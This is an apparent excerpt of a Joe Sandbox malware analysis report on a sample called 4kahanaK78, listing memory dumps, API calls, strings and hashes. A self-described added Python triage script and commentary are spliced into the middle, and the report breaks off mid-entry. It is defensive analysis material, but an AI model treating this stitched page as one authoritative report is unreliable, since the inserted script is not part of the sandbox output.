                                    • Source File: 00000000.00000002.3306653109.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_819000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: !g?$!o'$&o~$(/}$.9?$:{$"_
                                    • API String ID: 0-2666421078
                                    • Opcode ID: 6e3df8e2dd13b7518fc3e1311ebc3320351003b049075deddc043f8b41b3785c
                                    • Instruction ID: 63e1354e6404f3559d5b48e3823aa1224d2786c0ec94e5b5e57dae01f060d8ef
                                    • Opcode Fuzzy Hash: 6e3df8e2dd13b7518fc3e1311ebc3320351003b049075deddc043f8b41b3785c
                                    • Instruction Fuzzy Hash: 37B214F3A0C2149FE3046F2DEC8567ABBE5EF94720F1A4A3DEAC5C7744E63558408692
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306653109.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_819000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 1V~$2Rr{$3&{v$?V^$Kr^<$KyO~$<>[
                                    • API String ID: 0-2579797082
                                    • Opcode ID: 4d67f2d9ff450c6f314abdc8e8ceffeee0bf8523af8e0c7cfb5e8f86e71ac690
                                    • Instruction ID: b2fcf2050b114dcccb01503e231875de4692b4cf7a96b54abee20948ad5ab208
                                    • Opcode Fuzzy Hash: 4d67f2d9ff450c6f314abdc8e8ceffeee0bf8523af8e0c7cfb5e8f86e71ac690
                                    • Instruction Fuzzy Hash: ECB2E5F360C2009FE7046E29EC8567AFBE9EF94720F1A493DEAC4C3744E67598058697
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: __floor_pentium4
                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                    • API String ID: 4168288129-2761157908
                                    • Opcode ID: 14c724df0906a7543d709f4d96d1b8b7f4ee31c8485c5baae612bd997d7771c3
                                    • Instruction ID: d7ffb76180c9728a397d1ccf0e686cee7d0516322be8d88619d78ced8c4d9a03
                                    • Opcode Fuzzy Hash: 14c724df0906a7543d709f4d96d1b8b7f4ee31c8485c5baae612bd997d7771c3
                                    • Instruction Fuzzy Hash: F1C22A72E042288FDB25CE28DD507EAB3B5EB49314F1441ABD84DE7280E779AEC58F45
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306653109.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_819000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: &@y$@5g9$DXm$E!~~$Ra+w$]/13
                                    • API String ID: 0-2582686233
                                    • Opcode ID: 95199d6af41b5fe488c53db9d20da1f398365aa248c099697ba273506d89ddca
                                    • Instruction ID: de6357a38cf5a8c04608713ac98761819c17bce66ec2c481906450275c502fa1
                                    • Opcode Fuzzy Hash: 95199d6af41b5fe488c53db9d20da1f398365aa248c099697ba273506d89ddca
                                    • Instruction Fuzzy Hash: 08B258F3A0C2109FE3046E2DEC8567ABBE5EF94720F1A863DEAC4C7744E93558058697
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306653109.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_819000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: :;n$?/7$bN_$nT/V
                                    • API String ID: 0-913784486
                                    • Opcode ID: 2afae0264f887be88a95ab80353312b90a25a6f737701035a32ee40cc5f0e7c9
                                    • Instruction ID: ee3b36436c69700950cede54c16f1866150efa70671a2062b80d0342a2d04414
                                    • Opcode Fuzzy Hash: 2afae0264f887be88a95ab80353312b90a25a6f737701035a32ee40cc5f0e7c9
                                    • Instruction Fuzzy Hash: 31B217F360C304AFE3046E29EC8567ABBE9EF94720F1A493DE6C4C3744E63598458697
                                    APIs
                                    • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 10002FE6
                                    • IsDebuggerPresent.KERNEL32 ref: 100030B2
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100030D2
                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 100030DC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                    • String ID:
                                    • API String ID: 254469556-0
                                    • Opcode ID: fd06b871e9cf82683454e3fbfac267bd1ef2951c7b429272aa340f07bdb4f9c2
                                    • Instruction ID: 336d1356b37294b5c1fe5cc3e7a5e53ac0bdfc53d52c9a9f50db52ddd632742b
                                    • Opcode Fuzzy Hash: fd06b871e9cf82683454e3fbfac267bd1ef2951c7b429272aa340f07bdb4f9c2
                                    • Instruction Fuzzy Hash: B6312B75D45269DBEB21DF64C989BCDBBF8EF08340F1081AAE40DA7250EB719A85CF04
                                    APIs
                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 04B49A25
                                    • IsDebuggerPresent.KERNEL32 ref: 04B49AF1
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 04B49B11
                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 04B49B1B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                    • String ID:
                                    • API String ID: 254469556-0
                                    • Opcode ID: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
                                    • Instruction ID: 3f826736889305ecb234e0bb4f6114a69f31afa50bf0e8fcc6e92b3813a43dd4
                                    • Opcode Fuzzy Hash: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
                                    • Instruction Fuzzy Hash: AC311AB5D4121C9BDB20DFA4D989BCDBBB8BF48304F1040EAE409A7250EB715A85DF04
                                    APIs
                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004097BE
                                    • IsDebuggerPresent.KERNEL32 ref: 0040988A
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004098AA
                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 004098B4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                    • String ID:
                                    • API String ID: 254469556-0
                                    • Opcode ID: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
                                    • Instruction ID: c565fb8366faf90fb764b1371249259a4a166a2e914fc73a985bf40890c2a5d7
                                    • Opcode Fuzzy Hash: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
                                    • Instruction Fuzzy Hash: AB312BB5D1131CDBDB10EF65D9897CDBBB8BF18304F1040AAE409A7290EB755A85CF49
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 0,@$@$@,@$`,@
                                    • API String ID: 0-1654315312
                                    • Opcode ID: 5b4dbf54bdba94f60b787558392db44d93cafa9daf967c2ab35a05ecdb66b168
                                    • Instruction ID: d0229a7677e4139180f17e2684249ffde0658b308fba598201ba1c91857123c9
                                    • Opcode Fuzzy Hash: 5b4dbf54bdba94f60b787558392db44d93cafa9daf967c2ab35a05ecdb66b168
                                    • Instruction Fuzzy Hash: D2128C71B012099FDB14CF9AD980BBDB7BAFF48314F1441A9E909AB281DB74F941CB90
                                    APIs
                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 10005798
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100057A2
                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100057AF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                    • String ID:
                                    • API String ID: 3906539128-0
                                    • Opcode ID: ce89a4acebe00847e0bf7db2b2a5c1550e22667e6ae7b5dc377587a900902601
                                    • Instruction ID: 5682311db8f2ea5b7fb0b10b77ab1de1cec722dcfd082a676ba882e0b3775376
                                    • Opcode Fuzzy Hash: ce89a4acebe00847e0bf7db2b2a5c1550e22667e6ae7b5dc377587a900902601
                                    • Instruction Fuzzy Hash: 4B31D3749012299BDB62DF24DD89B8DBBB8EF08750F5081EAE41CA7250EB709F858F44
                                    APIs
                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 04B4C412
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 04B4C41C
                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 04B4C429
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                    • String ID:
                                    • API String ID: 3906539128-0
                                    • Opcode ID: 131c0d4e7d26b594cba5fcb71e5b1937b03cc24f2ec617643b077344ff1b42c4
                                    • Instruction ID: 46b9c7b27c31c4f677a546c9b3137b8e337d51f6eae02f45cfbb35a4547c6502
                                    • Opcode Fuzzy Hash: 131c0d4e7d26b594cba5fcb71e5b1937b03cc24f2ec617643b077344ff1b42c4
                                    • Instruction Fuzzy Hash: 5831C7B490122CABCB61DF28DD887DDBBB4BF48710F5041EAE41CA7250E770AB859F49
                                    APIs
                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0040C1AB
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040C1B5
                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0040C1C2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                    • String ID:
                                    • API String ID: 3906539128-0
                                    • Opcode ID: b149471185ea7cab19788dd3e2c66aa1f526c3a9366d234e05bd43495572b69a
                                    • Instruction ID: dd4c83c30a1d2e7c36c102c60c461113305a32f1f02fbca7a201bc05c8f10de1
                                    • Opcode Fuzzy Hash: b149471185ea7cab19788dd3e2c66aa1f526c3a9366d234e05bd43495572b69a
                                    • Instruction Fuzzy Hash: 3031E774901228EBCB21DF65D8897CDBBB4BF18310F5041EAE40CA7291E7349F858F49
                                    APIs
                                    • GetCurrentProcess.KERNEL32(?,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F47
                                    • TerminateProcess.KERNEL32(00000000,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F4E
                                    • ExitProcess.KERNEL32 ref: 10005F60
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: Process$CurrentExitTerminate
                                    • String ID:
                                    • API String ID: 1703294689-0
                                    • Opcode ID: 25e154c42a67dcf87d00edb929b2d1476c3327d7ef7788f8d8e64d02c0ecb1df
                                    • Instruction ID: 146749da7bea6e31057676a24497a7e39fcb2650f4e844f2ac51073fb5c6c599
                                    • Opcode Fuzzy Hash: 25e154c42a67dcf87d00edb929b2d1476c3327d7ef7788f8d8e64d02c0ecb1df
                                    • Instruction Fuzzy Hash: 02E08631404589EFEF069F10CD4CA993B69FB442C2B008024F50D8A135CB7AEDD1CB41
                                    APIs
                                    • GetCurrentProcess.KERNEL32(?,?,04B4F173,00000000,0041D0A0,?,00000000,?,04B51714), ref: 04B4F196
                                    • TerminateProcess.KERNEL32(00000000,?,04B4F173,00000000,0041D0A0,?,00000000,?,04B51714), ref: 04B4F19D
                                    • ExitProcess.KERNEL32 ref: 04B4F1AF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CurrentExitTerminate
                                    • String ID:
                                    • API String ID: 1703294689-0
                                    • Opcode ID: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
                                    • Instruction ID: 5a0b6906482cab578f04eaf4a73385882b6fb4f46445c91b1b3a9aa926e356b2
                                    • Opcode Fuzzy Hash: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
                                    • Instruction Fuzzy Hash: 0FE0B671844118AFDB117F54DD48A993B69FF90685F004464F80587231CB76E991DB94
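The three API sequences listed in the entries above (IsProcessorFeaturePresent(00000017) + IsDebuggerPresent + SetUnhandledExceptionFilter(00000000) + UnhandledExceptionFilter; the same trio without the feature check; GetCurrentProcess + TerminateProcess + ExitProcess) are what the MSVC runtime emits for its fastfail/GS-failure crash path, its unhandled-exception report path and its process-exit path, so the IsDebuggerPresent in them is compiler boilerplate rather than a deliberate debugger check; that attribution is mine, not the report's. The Python below is an added example, not part of the Joe Sandbox report or of the sandbox's own tooling: it parses entries in the page's text layout (a constructed, condensed sample built from the entries above), tags those CRT patterns so they can be set aside during triage, and groups entries by Opcode ID, which is address-independent, to show that the code dumped at 04B40000 (based on PE: false) is the same function body as code in the 00400000 image (same Opcode ID 3d6f7e7e…, different Instruction ID) and that it passes pointers into that image (0042AF64, 0041D0A0). All function names are mine.

```python
"""Post-process Joe Sandbox function entries: tag MSVC CRT boilerplate among the
listed API sequences and group entries by Opcode ID across memory-dump regions."""
import re
from collections import defaultdict

PF_FASTFAIL_AVAILABLE = 0x17  # the IsProcessorFeaturePresent(00000017) argument

# Constructed sample: four entries from this report, condensed to the lines the
# parser reads (addresses and hashes copied from the page).
SAMPLE = """\
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017), ref: 04B49A25
• IsDebuggerPresent.KERNEL32 ref: 04B49AF1
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 04B49B11
• UnhandledExceptionFilter.KERNEL32(?), ref: 04B49B1B
• Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
• Opcode ID: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004097BE
• IsDebuggerPresent.KERNEL32 ref: 0040988A
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004098AA
• UnhandledExceptionFilter.KERNEL32(?), ref: 004098B4
• Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Opcode ID: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
APIs
• GetCurrentProcess.KERNEL32(?,?,04B4F173,00000000,0041D0A0,?,00000000,?,04B51714), ref: 04B4F196
• TerminateProcess.KERNEL32(00000000,?,04B4F173,00000000,0041D0A0,?,00000000,?,04B51714), ref: 04B4F19D
• ExitProcess.KERNEL32 ref: 04B4F1AF
• Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
• Opcode ID: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
APIs
  • Part of subcall function 04B493D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B493E2
• Sleep.KERNEL32(000007D0), ref: 04B4552A
• Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
• Opcode ID: fedcac95627ff82dc7824c58def76200c42a9a8a38efeeb3af7ee738ebcd6dfb
"""

API_RE = re.compile(r"^\s*•\s*(?:Part of subcall function [0-9A-F]+:\s*)?"
                    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:")
SRC_RE = re.compile(r"Offset:\s*(?P<offset>[0-9A-F]+),\s*based on PE:\s*(?P<pe>true|false)")
OPC_RE = re.compile(r"^\s*•\s*Opcode ID:\s*(?P<val>[0-9a-f]{64})")
HEADERS = {"APIs", "Strings", "Memory Dump Source"}  # section lines that open an entry

# API sets the MSVC runtime emits in every release build (my attribution, see lead-in).
CRT_PATTERNS = {
    "crt fastfail / GS-failure path": frozenset({"IsProcessorFeaturePresent",
        "IsDebuggerPresent", "SetUnhandledExceptionFilter", "UnhandledExceptionFilter"}),
    "crt unhandled-exception report path": frozenset({"IsDebuggerPresent",
        "SetUnhandledExceptionFilter", "UnhandledExceptionFilter"}),
    "crt process exit path": frozenset({"GetCurrentProcess", "TerminateProcess", "ExitProcess"}),
}

def parse_entries(text):
    """Split report text into entries; a new one starts at the next section header
    once the current entry has its Opcode ID (the last field we need)."""
    entries, cur = [], dict(apis=[], opcode=None, offset=None, pe=None)
    for line in text.splitlines():
        if line.strip() in HEADERS and cur["opcode"]:
            entries.append(cur)
            cur = dict(apis=[], opcode=None, offset=None, pe=None)
        if (m := API_RE.match(line)):
            cur["apis"].append((m["name"], m["module"], m["args"] or ""))
        elif (m := SRC_RE.search(line)):
            cur["offset"], cur["pe"] = int(m["offset"], 16), m["pe"] == "true"
        elif (m := OPC_RE.match(line)):
            cur["opcode"] = m["val"]
    if cur["opcode"]:
        entries.append(cur)
    return entries

def _hex_args(args):
    """Recorded call arguments that are 8-digit hex values (the rest are '?')."""
    return [int(t, 16) for t in args.split(",") if re.fullmatch(r"[0-9A-F]{8}", t)]

def classify(entry):
    """Label the entry if its API set is exactly one CRT pattern, else None."""
    names = frozenset(name for name, _, _ in entry["apis"])
    for label, pattern in CRT_PATTERNS.items():
        if names != pattern:
            continue
        # The fastfail variant must query PF_FASTFAIL_AVAILABLE specifically.
        if "IsProcessorFeaturePresent" in names and not any(
                name == "IsProcessorFeaturePresent" and _hex_args(args)[:1] == [PF_FASTFAIL_AVAILABLE]
                for name, _, args in entry["apis"]):
            return None
        return label
    return None

def duplicated_code(entries):
    """Opcode ID -> sorted dump bases, for IDs seen in more than one region: the Opcode
    ID is address-independent, so a repeat means the same function body sits at
    several places in memory (the Instruction IDs differ with the address)."""
    regions = defaultdict(set)
    for e in entries:
        regions[e["opcode"]].add(e["offset"])
    return {k: sorted(v) for k, v in regions.items() if len(v) > 1}

def foreign_refs(entry, lo, hi):
    """Recorded call arguments of this entry that point into [lo, hi)."""
    return [v for _, _, args in entry["apis"] for v in _hex_args(args) if lo <= v < hi]

if __name__ == "__main__":
    for e in parse_entries(SAMPLE):
        print(f"{e['offset']:08X} {e['opcode'][:12]} {classify(e) or [n for n, _, _ in e['apis']]}")
    print("duplicated:", duplicated_code(parse_entries(SAMPLE)))
```

Run against the full report text, `classify` filters out the CRT entries that would otherwise inflate a "checks for debugger" count, and `duplicated_code` shows which dump regions carry the same function bodies as the 00400000 image, so the remaining, unmatched entries in the 04B40000 and 04CE0000 dumps are where manual review time is best spent.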
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306653109.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_819000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 9?$(w
                                    • API String ID: 0-2208932022
                                    • Opcode ID: fd60c88f7942208aa25034089ad6649aa3474deb93ab7aca3a00feecf28768aa
                                    • Instruction ID: 1242129f0a564b723ec9c07215b7f7a1dc6915d754f34c5fd33a182a91d9e21f
                                    • Opcode Fuzzy Hash: fd60c88f7942208aa25034089ad6649aa3474deb93ab7aca3a00feecf28768aa
                                    • Instruction Fuzzy Hash: 3AB217F360C2009FE704AE2DEC8567ABBE9EF94720F1A893DE6C583744E93558058797
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306653109.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_819000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: #b{L$Sl{
                                    • API String ID: 0-2527554373
                                    • Opcode ID: af723b17b530d366b47a2f74f0307db733bb91364f9519c5e0f9930b9dba41b1
                                    • Instruction ID: 333769aace645e568218ce24932ab7875ca7fe42d72323d0dc9d8436795e4cb3
                                    • Opcode Fuzzy Hash: af723b17b530d366b47a2f74f0307db733bb91364f9519c5e0f9930b9dba41b1
                                    • Instruction Fuzzy Hash: F2B2E6F3A0C2009FE304AE29EC8577AB7E5EF94720F16893DEAC4C7744EA7558058796
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: .$GetProcAddress.$l
                                    • API String ID: 0-2784972518
                                    • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                    • Instruction ID: d5037ae184a1353f3a29f5d41dbbdc7d36793d66b344cbbfc880b87a4d66a8bb
                                    • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                    • Instruction Fuzzy Hash: FB316CB6910609DFEB10DF99C880AAEBBF5FF48324F14408AD941A7310D771FA45DBA4
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
                                    • Instruction ID: 02789542c2a9dd6b1b9024e0eb83ec463df33c94b6ca43b61aaec5cd597af798
                                    • Opcode Fuzzy Hash: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
                                    • Instruction Fuzzy Hash: 31F14E71E002199FDF14CFA9D8806AEBBF2FF88354F15866DD919AB344D731AA01CB94
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
                                    • Instruction ID: e80ba316238a52440995120652ccb2ba54186a16ce09c0288fdc6cfb70fcf59f
                                    • Opcode Fuzzy Hash: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
                                    • Instruction Fuzzy Hash: A0F13071E00219DFDF14CFA9D9806ADF7B1FF88324F2582A9D919AB344D731A941DB90
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
                                    • Instruction ID: b8b31c7c7d4b51565c9f0be571567412a69d2e0e61470088d295795398052e15
                                    • Opcode Fuzzy Hash: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
                                    • Instruction Fuzzy Hash: BDF13D71E002199BDF24CFA8C9806AEB7B1FF88314F25827AD819B7785D735AD05CB94
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306653109.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_819000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: <2w?$vO
                                    • API String ID: 0-3489756923
                                    • Opcode ID: 0b371a4011787402b5831a0b3b78c3fb5b71548a8f68021a20fd7eb5fb37039f
                                    • Instruction ID: 1e0c27e69267a9f0a8de3f2bc8e3fa90ed5e52160db3e73e203ca961cdb395c4
                                    • Opcode Fuzzy Hash: 0b371a4011787402b5831a0b3b78c3fb5b71548a8f68021a20fd7eb5fb37039f
                                    • Instruction Fuzzy Hash: C20218F361C200AFE7086E2DDC8577AB7D9EF94720F1A453EEAC5C3744E93558018696
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: __floor_pentium4
                                    • String ID:
                                    • API String ID: 4168288129-0
                                    • Opcode ID: 74712b48cc111f858d1a31e9ba76b8487e7a66425b713155efa2ae010c3ee8cc
                                    • Instruction ID: 3f6a67a305f66c5e7a4f14eedf4bc49c5343a177f11854dd6e9b10dc1c656e69
                                    • Opcode Fuzzy Hash: 74712b48cc111f858d1a31e9ba76b8487e7a66425b713155efa2ae010c3ee8cc
                                    • Instruction Fuzzy Hash: 1DC25B71E046288FDBA4DE29DD407E9B3B6EB48314F1441EADA0DE7240E778BE858F50
                                    APIs
                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,1000E17F,?,?,00000008,?,?,1000DE14,00000000), ref: 1000E3B1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                     • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmp
